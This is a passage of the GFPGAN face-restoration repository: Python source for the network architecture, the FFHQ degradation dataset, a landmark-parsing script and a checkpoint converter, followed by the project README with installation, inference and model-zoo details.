num_mlp=8, lr_mlp=0.01, input_is_latent=False, different_w=False, narrow=1, sft_half=False): super(GFPGANBilinear, self).__init__() self.input_is_latent = input_is_latent self.different_w = different_w self.num_style_feat = num_style_feat unet_narrow = narrow * 0.5 # by default, use a half of input channels channels = { '4': int(512 * unet_narrow), '8': int(512 * unet_narrow), '16': int(512 * unet_narrow), '32': int(512 * unet_narrow), '64': int(256 * channel_multiplier * unet_narrow), '128': int(128 * channel_multiplier * unet_narrow), '256': int(64 * channel_multiplier * unet_narrow), '512': int(32 * channel_multiplier * unet_narrow), '1024': int(16 * channel_multiplier * unet_narrow) } self.log_size = int(math.log(out_size, 2)) first_out_size = 2**(int(math.log(out_size, 2))) self.conv_body_first = ConvLayer(3, channels[f'{first_out_size}'], 1, bias=True, activate=True) # downsample in_channels = channels[f'{first_out_size}'] self.conv_body_down = nn.ModuleList() for i in range(self.log_size, 2, -1): out_channels = channels[f'{2**(i - 1)}'] self.conv_body_down.append(ResBlock(in_channels, out_channels)) in_channels = out_channels self.final_conv = ConvLayer(in_channels, channels['4'], 3, bias=True, activate=True) # upsample in_channels = channels['4'] self.conv_body_up = nn.ModuleList() for i in range(3, self.log_size + 1): out_channels = channels[f'{2**i}'] self.conv_body_up.append(ResUpBlock(in_channels, out_channels)) in_channels = out_channels # to RGB self.toRGB = nn.ModuleList() for i in range(3, self.log_size + 1): self.toRGB.append(EqualConv2d(channels[f'{2**i}'], 3, 1, stride=1, padding=0, bias=True, bias_init_val=0)) if different_w: linear_out_channel = (int(math.log(out_size, 2)) * 2 - 2) * num_style_feat else: linear_out_channel = num_style_feat self.final_linear = EqualLinear( channels['4'] * 4 * 4, linear_out_channel, bias=True, bias_init_val=0, lr_mul=1, activation=None) # the decoder: stylegan2 generator with SFT modulations self.stylegan_decoder = StyleGAN2GeneratorBilinearSFT( out_size=out_size, num_style_feat=num_style_feat, num_mlp=num_mlp, channel_multiplier=channel_multiplier, lr_mlp=lr_mlp, narrow=narrow, sft_half=sft_half) # load pre-trained stylegan2 model if necessary if decoder_load_path: self.stylegan_decoder.load_state_dict( torch.load(decoder_load_path, map_location=lambda storage, loc: storage)['params_ema']) # fix decoder without updating params if fix_decoder: for _, param in self.stylegan_decoder.named_parameters(): param.requires_grad = False # for SFT modulations (scale and shift) self.condition_scale = nn.ModuleList() self.condition_shift = nn.ModuleList() for i in range(3, self.log_size + 1): out_channels = channels[f'{2**i}'] if sft_half: sft_out_channels = out_channels else: sft_out_channels = out_channels * 2 self.condition_scale.append( nn.Sequential( EqualConv2d(out_channels, out_channels, 3, stride=1, padding=1, bias=True, bias_init_val=0), ScaledLeakyReLU(0.2), EqualConv2d(out_channels, sft_out_channels, 3, stride=1, padding=1, bias=True, bias_init_val=1))) self.condition_shift.append( nn.Sequential( EqualConv2d(out_channels, out_channels, 3, stride=1, padding=1, bias=True, bias_init_val=0), ScaledLeakyReLU(0.2), EqualConv2d(out_channels, sft_out_channels, 3, stride=1, padding=1, bias=True, bias_init_val=0))) def forward(self, x, return_latents=False, return_rgb=True, randomize_noise=True): """Forward function for GFPGANBilinear. Args: x (Tensor): Input images. return_latents (bool): Whether to return style latents. Default: False. return_rgb (bool): Whether return intermediate rgb images. Default: True. randomize_noise (bool): Randomize noise, used when 'noise' is False. Default: True. """ conditions = [] unet_skips = [] out_rgbs = [] # encoder feat = self.conv_body_first(x) for i in range(self.log_size - 2): feat = self.conv_body_down[i](feat) unet_skips.insert(0, feat) feat = self.final_conv(feat) # style code style_code = self.final_linear(feat.view(feat.size(0), -1)) if self.different_w: style_code = style_code.view(style_code.size(0), -1, self.num_style_feat) # decode for i in range(self.log_size - 2): # add unet skip feat = feat + unet_skips[i] # ResUpLayer feat = self.conv_body_up[i](feat) # generate scale and shift for SFT layers scale = self.condition_scale[i](feat) conditions.append(scale.clone()) shift = self.condition_shift[i](feat) conditions.append(shift.clone()) # generate rgb images if return_rgb: out_rgbs.append(self.toRGB[i](feat)) # decoder image, _ = self.stylegan_decoder([style_code], conditions, return_latents=return_latents, input_is_latent=self.input_is_latent, randomize_noise=randomize_noise) return image, out_rgbs File: gfpgan/data/ffhq_degradation_dataset.py import cv2 import math import numpy as np import os.path as osp import torch import torch.utils.data as data from basicsr.data import degradations as degradations from basicsr.data.data_util import paths_from_folder from basicsr.data.transforms import augment from basicsr.utils import FileClient, get_root_logger, imfrombytes, img2tensor from basicsr.utils.registry import DATASET_REGISTRY from torchvision.transforms.functional import (adjust_brightness, adjust_contrast, adjust_hue, adjust_saturation, normalize) @DATASET_REGISTRY.register() class FFHQDegradationDataset(data.Dataset): """FFHQ dataset for GFPGAN. It reads high resolution images, and then generate low-quality (LQ) images on-the-fly. Args: opt (dict): Config for train datasets. It contains the following keys: dataroot_gt (str): Data root path for gt. io_backend (dict): IO backend type and other kwarg. mean (list | tuple): Image mean. std (list | tuple): Image std. use_hflip (bool): Whether to horizontally flip. Please see more options in the codes. """ def __init__(self, opt): super(FFHQDegradationDataset, self).__init__() self.opt = opt # file client (io backend) self.file_client = None self.io_backend_opt = opt['io_backend'] self.gt_folder = opt['dataroot_gt'] self.mean = opt['mean'] self.std = opt['std'] self.out_size = opt['out_size'] self.crop_components = opt.get('crop_components', False) # facial components self.eye_enlarge_ratio = opt.get('eye_enlarge_ratio', 1) # whether enlarge eye regions if self.crop_components: # load component list from a pre-process pth files self.components_list = torch.load(opt.get('component_path')) # file client (lmdb io backend) if self.io_backend_opt['type'] == 'lmdb': self.io_backend_opt['db_paths'] = self.gt_folder if not self.gt_folder.endswith('.lmdb'): raise ValueError(f"'dataroot_gt' should end with '.lmdb', but received {self.gt_folder}") with open(osp.join(self.gt_folder, 'meta_info.txt')) as fin: self.paths = [line.split('.')[0] for line in fin] else: # disk backend: scan file list from a folder self.paths = paths_from_folder(self.gt_folder) # degradation configurations self.blur_kernel_size = opt['blur_kernel_size'] self.kernel_list = opt['kernel_list'] self.kernel_prob = opt['kernel_prob'] self.blur_sigma = opt['blur_sigma'] self.downsample_range = opt['downsample_range'] self.noise_range = opt['noise_range'] self.jpeg_range = opt['jpeg_range'] # color jitter self.color_jitter_prob = opt.get('color_jitter_prob') self.color_jitter_pt_prob = opt.get('color_jitter_pt_prob') self.color_jitter_shift = opt.get('color_jitter_shift', 20) # to gray self.gray_prob = opt.get('gray_prob') logger = get_root_logger() logger.info(f'Blur: blur_kernel_size {self.blur_kernel_size}, sigma: [{", ".join(map(str, self.blur_sigma))}]') logger.info(f'Downsample: downsample_range [{", ".join(map(str, self.downsample_range))}]') logger.info(f'Noise: [{", ".join(map(str, self.noise_range))}]') logger.info(f'JPEG compression: [{", ".join(map(str, self.jpeg_range))}]') if self.color_jitter_prob is not None: logger.info(f'Use random color jitter. Prob: {self.color_jitter_prob}, shift: {self.color_jitter_shift}') if self.gray_prob is not None: logger.info(f'Use random gray. Prob: {self.gray_prob}') self.color_jitter_shift /= 255. @staticmethod def color_jitter(img, shift): """jitter color: randomly jitter the RGB values, in numpy formats""" jitter_val = np.random.uniform(-shift, shift, 3).astype(np.float32) img = img + jitter_val img = np.clip(img, 0, 1) return img @staticmethod def color_jitter_pt(img, brightness, contrast, saturation, hue): """jitter color: randomly jitter the brightness, contrast, saturation, and hue, in torch Tensor formats""" fn_idx = torch.randperm(4) for fn_id in fn_idx: if fn_id == 0 and brightness is not None: brightness_factor = torch.tensor(1.0).uniform_(brightness[0], brightness[1]).item() img = adjust_brightness(img, brightness_factor) if fn_id == 1 and contrast is not None: contrast_factor = torch.tensor(1.0).uniform_(contrast[0], contrast[1]).item() img = adjust_contrast(img, contrast_factor) if fn_id == 2 and saturation is not None: saturation_factor = torch.tensor(1.0).uniform_(saturation[0], saturation[1]).item() img = adjust_saturation(img, saturation_factor) if fn_id == 3 and hue is not None: hue_factor = torch.tensor(1.0).uniform_(hue[0], hue[1]).item() img = adjust_hue(img, hue_factor) return img def get_component_coordinates(self, index, status): """Get facial component (left_eye, right_eye, mouth) coordinates from a pre-loaded pth file""" components_bbox = self.components_list[f'{index:08d}'] if status[0]: # hflip # exchange right and left eye tmp = components_bbox['left_eye'] components_bbox['left_eye'] = components_bbox['right_eye'] components_bbox['right_eye'] = tmp # modify the width coordinate components_bbox['left_eye'][0] = self.out_size - components_bbox['left_eye'][0] components_bbox['right_eye'][0] = self.out_size - components_bbox['right_eye'][0] components_bbox['mouth'][0] = self.out_size - components_bbox['mouth'][0] # get coordinates locations = [] for part in ['left_eye', 'right_eye', 'mouth']: mean = components_bbox[part][0:2] half_len = components_bbox[part][2] if 'eye' in part: half_len *= self.eye_enlarge_ratio loc = np.hstack((mean - half_len + 1, mean + half_len)) loc = torch.from_numpy(loc).float() locations.append(loc) return locations def __getitem__(self, index): if self.file_client is None: self.file_client = FileClient(self.io_backend_opt.pop('type'), **self.io_backend_opt) # load gt image # Shape: (h, w, c); channel order: BGR; image range: [0, 1], float32. gt_path = self.paths[index] img_bytes = self.file_client.get(gt_path) img_gt = imfrombytes(img_bytes, float32=True) # random horizontal flip img_gt, status = augment(img_gt, hflip=self.opt['use_hflip'], rotation=False, return_status=True) h, w, _ = img_gt.shape # get facial component coordinates if self.crop_components: locations = self.get_component_coordinates(index, status) loc_left_eye, loc_right_eye, loc_mouth = locations # ------------------------ generate lq image ------------------------ # # blur kernel = degradations.random_mixed_kernels( self.kernel_list, self.kernel_prob, self.blur_kernel_size, self.blur_sigma, self.blur_sigma, [-math.pi, math.pi], noise_range=None) img_lq = cv2.filter2D(img_gt, -1, kernel) # downsample scale = np.random.uniform(self.downsample_range[0], self.downsample_range[1]) img_lq = cv2.resize(img_lq, (int(w // scale), int(h // scale)), interpolation=cv2.INTER_LINEAR) # noise if self.noise_range is not None: img_lq = degradations.random_add_gaussian_noise(img_lq, self.noise_range) # jpeg compression if self.jpeg_range is not None: img_lq = degradations.random_add_jpg_compression(img_lq, self.jpeg_range) # resize to original size img_lq = cv2.resize(img_lq, (w, h), interpolation=cv2.INTER_LINEAR) # random color jitter (only for lq) if self.color_jitter_prob is not None and (np.random.uniform() < self.color_jitter_prob): img_lq = self.color_jitter(img_lq, self.color_jitter_shift) # random to gray (only for lq) if self.gray_prob and np.random.uniform() < self.gray_prob: img_lq = cv2.cvtColor(img_lq, cv2.COLOR_BGR2GRAY) img_lq = np.tile(img_lq[:, :, None], [1, 1, 3]) if self.opt.get('gt_gray'): # whether convert GT to gray images img_gt = cv2.cvtColor(img_gt, cv2.COLOR_BGR2GRAY) img_gt = np.tile(img_gt[:, :, None], [1, 1, 3]) # repeat the color channels # BGR to RGB, HWC to CHW, numpy to tensor img_gt, img_lq = img2tensor([img_gt, img_lq], bgr2rgb=True, float32=True) # random color jitter (pytorch version) (only for lq) if self.color_jitter_pt_prob is not None and (np.random.uniform() < self.color_jitter_pt_prob): brightness = self.opt.get('brightness', (0.5, 1.5)) contrast = self.opt.get('contrast', (0.5, 1.5)) saturation = self.opt.get('saturation', (0, 1.5)) hue = self.opt.get('hue', (-0.1, 0.1)) img_lq = self.color_jitter_pt(img_lq, brightness, contrast, saturation, hue) # round and clip img_lq = torch.clamp((img_lq * 255.0).round(), 0, 255) / 255. # normalize normalize(img_gt, self.mean, self.std, inplace=True) normalize(img_lq, self.mean, self.std, inplace=True) if self.crop_components: return_dict = { 'lq': img_lq, 'gt': img_gt, 'gt_path': gt_path, 'loc_left_eye': loc_left_eye, 'loc_right_eye': loc_right_eye, 'loc_mouth': loc_mouth } return return_dict else: return {'lq': img_lq, 'gt': img_gt, 'gt_path': gt_path} def __len__(self): return len(self.paths) File: gfpgan/data/__init__.py import importlib from basicsr.utils import scandir from os import path as osp # automatically scan and import dataset modules for registry # scan all the files that end with '_dataset.py' under the data folder data_folder = osp.dirname(osp.abspath(__file__)) dataset_filenames = [osp.splitext(osp.basename(v))[0] for v in scandir(data_folder) if v.endswith('_dataset.py')] # import all the dataset modules _dataset_modules = [importlib.import_module(f'gfpgan.data.{file_name}') for file_name in dataset_filenames] File: scripts/parse_landmark.py import cv2 import json import numpy as np import os import torch from basicsr.utils import FileClient, imfrombytes from collections import OrderedDict # ---------------------------- This script is used to parse facial landmarks ------------------------------------- # # Configurations save_img = False scale = 0.5 # 0.5 for official FFHQ (512x512), 1 for others enlarge_ratio = 1.4 # only for eyes json_path = 'ffhq-dataset-v2.json' face_path = 'datasets/ffhq/ffhq_512.lmdb' save_path = './FFHQ_eye_mouth_landmarks_512.pth' print('Load JSON metadata...') # use the official json file in FFHQ dataset with open(json_path, 'rb') as f: json_data = json.load(f, object_pairs_hook=OrderedDict) print('Open LMDB file...') # read ffhq images file_client = FileClient('lmdb', db_paths=face_path) with open(os.path.join(face_path, 'meta_info.txt')) as fin: paths = [line.split('.')[0] for line in fin] save_dict = {} for item_idx, item in enumerate(json_data.values()): print(f'\r{item_idx} / {len(json_data)}, {item["image"]["file_path"]} ', end='', flush=True) # parse landmarks lm = np.array(item['image']['face_landmarks']) lm = lm * scale item_dict = {} # get image if save_img: img_bytes = file_client.get(paths[item_idx]) img = imfrombytes(img_bytes, float32=True) # get landmarks for each component map_left_eye = list(range(36, 42)) map_right_eye = list(range(42, 48)) map_mouth = list(range(48, 68)) # eye_left mean_left_eye = np.mean(lm[map_left_eye], 0) # (x, y) half_len_left_eye = np.max((np.max(np.max(lm[map_left_eye], 0) - np.min(lm[map_left_eye], 0)) / 2, 16)) item_dict['left_eye'] = [mean_left_eye[0], mean_left_eye[1], half_len_left_eye] # mean_left_eye[0] = 512 - mean_left_eye[0] # for testing flip half_len_left_eye *= enlarge_ratio loc_left_eye = np.hstack((mean_left_eye - half_len_left_eye + 1, mean_left_eye + half_len_left_eye)).astype(int) if save_img: eye_left_img = img[loc_left_eye[1]:loc_left_eye[3], loc_left_eye[0]:loc_left_eye[2], :] cv2.imwrite(f'tmp/{item_idx:08d}_eye_left.png', eye_left_img * 255) # eye_right mean_right_eye = np.mean(lm[map_right_eye], 0) half_len_right_eye = np.max((np.max(np.max(lm[map_right_eye], 0) - np.min(lm[map_right_eye], 0)) / 2, 16)) item_dict['right_eye'] = [mean_right_eye[0], mean_right_eye[1], half_len_right_eye] # mean_right_eye[0] = 512 - mean_right_eye[0] # # for testing flip half_len_right_eye *= enlarge_ratio loc_right_eye = np.hstack( (mean_right_eye - half_len_right_eye + 1, mean_right_eye + half_len_right_eye)).astype(int) if save_img: eye_right_img = img[loc_right_eye[1]:loc_right_eye[3], loc_right_eye[0]:loc_right_eye[2], :] cv2.imwrite(f'tmp/{item_idx:08d}_eye_right.png', eye_right_img * 255) # mouth mean_mouth = np.mean(lm[map_mouth], 0) half_len_mouth = np.max((np.max(np.max(lm[map_mouth], 0) - np.min(lm[map_mouth], 0)) / 2, 16)) item_dict['mouth'] = [mean_mouth[0], mean_mouth[1], half_len_mouth] # mean_mouth[0] = 512 - mean_mouth[0] # for testing flip loc_mouth = np.hstack((mean_mouth - half_len_mouth + 1, mean_mouth + half_len_mouth)).astype(int) if save_img: mouth_img = img[loc_mouth[1]:loc_mouth[3], loc_mouth[0]:loc_mouth[2], :] cv2.imwrite(f'tmp/{item_idx:08d}_mouth.png', mouth_img * 255) save_dict[f'{item_idx:08d}'] = item_dict print('Save...') torch.save(save_dict, save_path) File: scripts/convert_gfpganv_to_clean.py import argparse import math import torch from gfpgan.archs.gfpganv1_clean_arch import GFPGANv1Clean def modify_checkpoint(checkpoint_bilinear, checkpoint_clean): for ori_k, ori_v in checkpoint_bilinear.items(): if 'stylegan_decoder' in ori_k: if 'style_mlp' in ori_k: # style_mlp_layers lr_mul = 0.01 prefix, name, idx, var = ori_k.split('.') idx = (int(idx) * 2) - 1 crt_k = f'{prefix}.{name}.{idx}.{var}' if var == 'weight': _, c_in = ori_v.size() scale = (1 / math.sqrt(c_in)) * lr_mul crt_v = ori_v * scale * 2**0.5 else: crt_v = ori_v * lr_mul * 2**0.5 checkpoint_clean[crt_k] = crt_v elif 'modulation' in ori_k: # modulation in StyleConv lr_mul = 1 crt_k = ori_k var = ori_k.split('.')[-1] if var == 'weight': _, c_in = ori_v.size() scale = (1 / math.sqrt(c_in)) * lr_mul crt_v = ori_v * scale else: crt_v = ori_v * lr_mul checkpoint_clean[crt_k] = crt_v elif 'style_conv' in ori_k: # StyleConv in style_conv1 and style_convs if 'activate' in ori_k: # FusedLeakyReLU # eg. style_conv1.activate.bias # eg. style_convs.13.activate.bias split_rlt = ori_k.split('.') if len(split_rlt) == 4: prefix, name, _, var = split_rlt crt_k = f'{prefix}.{name}.{var}' elif len(split_rlt) == 5: prefix, name, idx, _, var = split_rlt crt_k = f'{prefix}.{name}.{idx}.{var}' crt_v = ori_v * 2**0.5 # 2**0.5 used in FusedLeakyReLU c = crt_v.size(0) checkpoint_clean[crt_k] = crt_v.view(1, c, 1, 1) elif 'modulated_conv' in ori_k: # eg. style_conv1.modulated_conv.weight # eg. style_convs.13.modulated_conv.weight _, c_out, c_in, k1, k2 = ori_v.size() scale = 1 / math.sqrt(c_in * k1 * k2) crt_k = ori_k checkpoint_clean[crt_k] = ori_v * scale elif 'weight' in ori_k: crt_k = ori_k checkpoint_clean[crt_k] = ori_v * 2**0.5 elif 'to_rgb' in ori_k: # StyleConv in to_rgb1 and to_rgbs if 'modulated_conv' in ori_k: # eg. to_rgb1.modulated_conv.weight # eg. to_rgbs.5.modulated_conv.weight _, c_out, c_in, k1, k2 = ori_v.size() scale = 1 / math.sqrt(c_in * k1 * k2) crt_k = ori_k checkpoint_clean[crt_k] = ori_v * scale else: crt_k = ori_k checkpoint_clean[crt_k] = ori_v else: crt_k = ori_k checkpoint_clean[crt_k] = ori_v # end of 'stylegan_decoder' elif 'conv_body_first' in ori_k or 'final_conv' in ori_k: # key name name, _, var = ori_k.split('.') crt_k = f'{name}.{var}' # weight and bias if var == 'weight': c_out, c_in, k1, k2 = ori_v.size() scale = 1 / math.sqrt(c_in * k1 * k2) checkpoint_clean[crt_k] = ori_v * scale * 2**0.5 else: checkpoint_clean[crt_k] = ori_v * 2**0.5 elif 'conv_body' in ori_k: if 'conv_body_up' in ori_k: ori_k = ori_k.replace('conv2.weight', 'conv2.1.weight') ori_k = ori_k.replace('skip.weight', 'skip.1.weight') name1, idx1, name2, _, var = ori_k.split('.') crt_k = f'{name1}.{idx1}.{name2}.{var}' if name2 == 'skip': c_out, c_in, k1, k2 = ori_v.size() scale = 1 / math.sqrt(c_in * k1 * k2) checkpoint_clean[crt_k] = ori_v * scale / 2**0.5 else: if var == 'weight': c_out, c_in, k1, k2 = ori_v.size() scale = 1 / math.sqrt(c_in * k1 * k2) checkpoint_clean[crt_k] = ori_v * scale else: checkpoint_clean[crt_k] = ori_v if 'conv1' in ori_k: checkpoint_clean[crt_k] *= 2**0.5 elif 'toRGB' in ori_k: crt_k = ori_k if 'weight' in ori_k: c_out, c_in, k1, k2 = ori_v.size() scale = 1 / math.sqrt(c_in * k1 * k2) checkpoint_clean[crt_k] = ori_v * scale else: checkpoint_clean[crt_k] = ori_v elif 'final_linear' in ori_k: crt_k = ori_k if 'weight' in ori_k: _, c_in = ori_v.size() scale = 1 / math.sqrt(c_in) checkpoint_clean[crt_k] = ori_v * scale else: checkpoint_clean[crt_k] = ori_v elif 'condition' in ori_k: crt_k = ori_k if '0.weight' in ori_k: c_out, c_in, k1, k2 = ori_v.size() scale = 1 / math.sqrt(c_in * k1 * k2) checkpoint_clean[crt_k] = ori_v * scale * 2**0.5 elif '0.bias' in ori_k: checkpoint_clean[crt_k] = ori_v * 2**0.5 elif '2.weight' in ori_k: c_out, c_in, k1, k2 = ori_v.size() scale = 1 / math.sqrt(c_in * k1 * k2) checkpoint_clean[crt_k] = ori_v * scale elif '2.bias' in ori_k: checkpoint_clean[crt_k] = ori_v return checkpoint_clean if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--ori_path', type=str, help='Path to the original model') parser.add_argument('--narrow', type=float, default=1) parser.add_argument('--channel_multiplier', type=float, default=2) parser.add_argument('--save_path', type=str) args = parser.parse_args() ori_ckpt = torch.load(args.ori_path)['params_ema'] net = GFPGANv1Clean( 512, num_style_feat=512, channel_multiplier=args.channel_multiplier, decoder_load_path=None, fix_decoder=False, # for stylegan decoder num_mlp=8, input_is_latent=True, different_w=True, narrow=args.narrow, sft_half=True) crt_ckpt = net.state_dict() crt_ckpt = modify_checkpoint(ori_ckpt, crt_ckpt) print(f'Save to {args.save_path}.') torch.save(dict(params_ema=crt_ckpt), args.save_path, _use_new_zipfile_serialization=False)
<p align="center"> <img src="assets/gfpgan_logo.png" height=130> </p> ## <div align="center"><b><a href="README.md">English</a> | <a href="README_CN.md">简体中文</a></b></div> <div align="center"> <!-- <a href="https://twitter.com/_Xintao_" style="text-decoration:none;"> <img src="https://user-images.githubusercontent.com/17445847/187162058-c764ced6-952f-404b-ac85-ba95cce18e7b.png" width="4%" alt="" /> </a> --> [![download](https://img.shields.io/github/downloads/TencentARC/GFPGAN/total.svg)](https://github.com/TencentARC/GFPGAN/releases) [![PyPI](https://img.shields.io/pypi/v/gfpgan)](https://pypi.org/project/gfpgan/) [![Open issue](https://img.shields.io/github/issues/TencentARC/GFPGAN)](https://github.com/TencentARC/GFPGAN/issues) [![Closed issue](https://img.shields.io/github/issues-closed/TencentARC/GFPGAN)](https://github.com/TencentARC/GFPGAN/issues) [![LICENSE](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://github.com/TencentARC/GFPGAN/blob/master/LICENSE) [![python lint](https://github.com/TencentARC/GFPGAN/actions/workflows/pylint.yml/badge.svg)](https://github.com/TencentARC/GFPGAN/blob/master/.github/workflows/pylint.yml) [![Publish-pip](https://github.com/TencentARC/GFPGAN/actions/workflows/publish-pip.yml/badge.svg)](https://github.com/TencentARC/GFPGAN/blob/master/.github/workflows/publish-pip.yml) </div> 1. :boom: **Updated** online demo: [![Replicate](https://img.shields.io/static/v1?label=Demo&message=Replicate&color=blue)](https://replicate.com/tencentarc/gfpgan). Here is the [backup](https://replicate.com/xinntao/gfpgan). 1. :boom: **Updated** online demo: [![Huggingface Gradio](https://img.shields.io/static/v1?label=Demo&message=Huggingface%20Gradio&color=orange)](https://huggingface.co/spaces/Xintao/GFPGAN) 1. [Colab Demo](https://colab.research.google.com/drive/1sVsoBd9AjckIXThgtZhGrHRfFI6UUYOo) for GFPGAN <a href="https://colab.research.google.com/drive/1sVsoBd9AjckIXThgtZhGrHRfFI6UUYOo"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="google colab logo"></a>; (Another [Colab Demo](https://colab.research.google.com/drive/1Oa1WwKB4M4l1GmR7CtswDVgOCOeSLChA?usp=sharing) for the original paper model) <!-- 3. Online demo: [Replicate.ai](https://replicate.com/xinntao/gfpgan) (may need to sign in, return the whole image) 4. Online demo: [Baseten.co](https://app.baseten.co/applications/Q04Lz0d/operator_views/8qZG6Bg) (backed by GPU, returns the whole image) 5. We provide a *clean* version of GFPGAN, which can run without CUDA extensions. So that it can run in **Windows** or on **CPU mode**. --> > :rocket: **Thanks for your interest in our work. You may also want to check our new updates on the *tiny models* for *anime images and videos* in [Real-ESRGAN](https://github.com/xinntao/Real-ESRGAN/blob/master/docs/anime_video_model.md)** :blush: GFPGAN aims at developing a **Practical Algorithm for Real-world Face Restoration**.<br> It leverages rich and diverse priors encapsulated in a pretrained face GAN (*e.g.*, StyleGAN2) for blind face restoration. :question: Frequently Asked Questions can be found in [FAQ.md](FAQ.md). :triangular_flag_on_post: **Updates** - :white_check_mark: Add [RestoreFormer](https://github.com/wzhouxiff/RestoreFormer) inference codes. - :white_check_mark: Add [V1.4 model](https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.4.pth), which produces slightly more details and better identity than V1.3. - :white_check_mark: Add **[V1.3 model](https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.3.pth)**, which produces **more natural** restoration results, and better results on *very low-quality* / *high-quality* inputs. See more in [Model zoo](#european_castle-model-zoo), [Comparisons.md](Comparisons.md) - :white_check_mark: Integrated to [Huggingface Spaces](https://huggingface.co/spaces) with [Gradio](https://github.com/gradio-app/gradio). See [Gradio Web Demo](https://huggingface.co/spaces/akhaliq/GFPGAN). - :white_check_mark: Support enhancing non-face regions (background) with [Real-ESRGAN](https://github.com/xinntao/Real-ESRGAN). - :white_check_mark: We provide a *clean* version of GFPGAN, which does not require CUDA extensions. - :white_check_mark: We provide an updated model without colorizing faces. --- If GFPGAN is helpful in your photos/projects, please help to :star: this repo or recommend it to your friends. Thanks:blush: Other recommended projects:<br> :arrow_forward: [Real-ESRGAN](https://github.com/xinntao/Real-ESRGAN): A practical algorithm for general image restoration<br> :arrow_forward: [BasicSR](https://github.com/xinntao/BasicSR): An open-source image and video restoration toolbox<br> :arrow_forward: [facexlib](https://github.com/xinntao/facexlib): A collection that provides useful face-relation functions<br> :arrow_forward: [HandyView](https://github.com/xinntao/HandyView): A PyQt5-based image viewer that is handy for view and comparison<br> --- ### :book: GFP-GAN: Towards Real-World Blind Face Restoration with Generative Facial Prior > [[Paper](https://arxiv.org/abs/2101.04061)] &emsp; [[Project Page](https://xinntao.github.io/projects/gfpgan)] &emsp; [Demo] <br> > [Xintao Wang](https://xinntao.github.io/), [Yu Li](https://yu-li.github.io/), [Honglun Zhang](https://scholar.google.com/citations?hl=en&user=KjQLROoAAAAJ), [Ying Shan](https://scholar.google.com/citations?user=4oXBp9UAAAAJ&hl=en) <br> > Applied Research Center (ARC), Tencent PCG <p align="center"> <img src="https://xinntao.github.io/projects/GFPGAN_src/gfpgan_teaser.jpg"> </p> --- ## :wrench: Dependencies and Installation - Python >= 3.7 (Recommend to use [Anaconda](https://www.anaconda.com/download/#linux) or [Miniconda](https://docs.conda.io/en/latest/miniconda.html)) - [PyTorch >= 1.7](https://pytorch.org/) - Option: NVIDIA GPU + [CUDA](https://developer.nvidia.com/cuda-downloads) - Option: Linux ### Installation We now provide a *clean* version of GFPGAN, which does not require customized CUDA extensions. <br> If you want to use the original model in our paper, please see [PaperModel.md](PaperModel.md) for installation. 1. Clone repo ```bash git clone https://github.com/TencentARC/GFPGAN.git cd GFPGAN ``` 1. Install dependent packages ```bash # Install basicsr - https://github.com/xinntao/BasicSR # We use BasicSR for both training and inference pip install basicsr # Install facexlib - https://github.com/xinntao/facexlib # We use face detection and face restoration helper in the facexlib package pip install facexlib pip install -r requirements.txt python setup.py develop # If you want to enhance the background (non-face) regions with Real-ESRGAN, # you also need to install the realesrgan package pip install realesrgan ``` ## :zap: Quick Inference We take the v1.3 version for an example. More models can be found [here](#european_castle-model-zoo). Download pre-trained models: [GFPGANv1.3.pth](https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.3.pth) ```bash wget https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.3.pth -P experiments/pretrained_models ``` **Inference!** ```bash python inference_gfpgan.py -i inputs/whole_imgs -o results -v 1.3 -s 2 ``` ```console Usage: python inference_gfpgan.py -i inputs/whole_imgs -o results -v 1.3 -s 2 [options]... -h show this help -i input Input image or folder. Default: inputs/whole_imgs -o output Output folder. Default: results -v version GFPGAN model version. Option: 1 | 1.2 | 1.3. Default: 1.3 -s upscale The final upsampling scale of the image. Default: 2 -bg_upsampler background upsampler. Default: realesrgan -bg_tile Tile size for background sampler, 0 for no tile during testing. Default: 400 -suffix Suffix of the restored faces -only_center_face Only restore the center face -aligned Input are aligned faces -ext Image extension. Options: auto | jpg | png, auto means using the same extension as inputs. Default: auto ``` If you want to use the original model in our paper, please see [PaperModel.md](PaperModel.md) for installation and inference. ## :european_castle: Model Zoo | Version | Model Name | Description | | :---: | :---: | :---: | | V1.3 | [GFPGANv1.3.pth](https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.3.pth) | Based on V1.2; **more natural** restoration results; better results on very low-quality / high-quality inputs. | | V1.2 | [GFPGANCleanv1-NoCE-C2.pth](https://github.com/TencentARC/GFPGAN/releases/download/v0.2.0/GFPGANCleanv1-NoCE-C2.pth) | No colorization; no CUDA extensions are required. Trained with more data with pre-processing. | | V1 | [GFPGANv1.pth](https://github.com/TencentARC/GFPGAN/releases/download/v0.1.0/GFPGANv1.pth) | The paper model, with colorization. | The comparisons are in [Comparisons.md](Comparisons.md). Note that V1.3 is not always better than V1.2. You may need to select different models based on your purpose and inputs. | Version | Strengths | Weaknesses | | :---: | :---: | :---: | |V1.3 | ✓ natural outputs<br> ✓better results on very low-quality inputs <br> ✓ work on relatively high-quality inputs <br>✓ can have repeated (twice) restorations | ✗ not very sharp <br> ✗ have a slight change on identity | |V1.2 | ✓ sharper output <br> ✓ with beauty makeup | ✗ some outputs are unnatural | You can find **more models (such as the discriminators)** here: [[Google Drive](https://drive.google.com/drive/folders/17rLiFzcUMoQuhLnptDsKolegHWwJOnHu?usp=sharing)], OR [[Tencent Cloud 腾讯微云](https://share.weiyun.com/ShYoCCoc)] ## :computer: Training We provide the training codes for GFPGAN (used in our paper). <br> You could improve it according to your own needs. **Tips** 1. More high quality faces can improve the restoration quality. 2. You may need to perform some pre-processing, such as beauty makeup. **Procedures** (You can try a simple version ( `options/train_gfpgan_v1_simple.yml`) that does not require face component landmarks.) 1. Dataset preparation: [FFHQ](https://github.com/NVlabs/ffhq-dataset) 1. Download pre-trained models and other data. Put them in the `experiments/pretrained_models` folder. 1. [Pre-trained StyleGAN2 model: StyleGAN2_512_Cmul1_FFHQ_B12G4_scratch_800k.pth](https://github.com/TencentARC/GFPGAN/releases/download/v0.1.0/StyleGAN2_512_Cmul1_FFHQ_B12G4_scratch_800k.pth) 1. [Component locations of FFHQ: 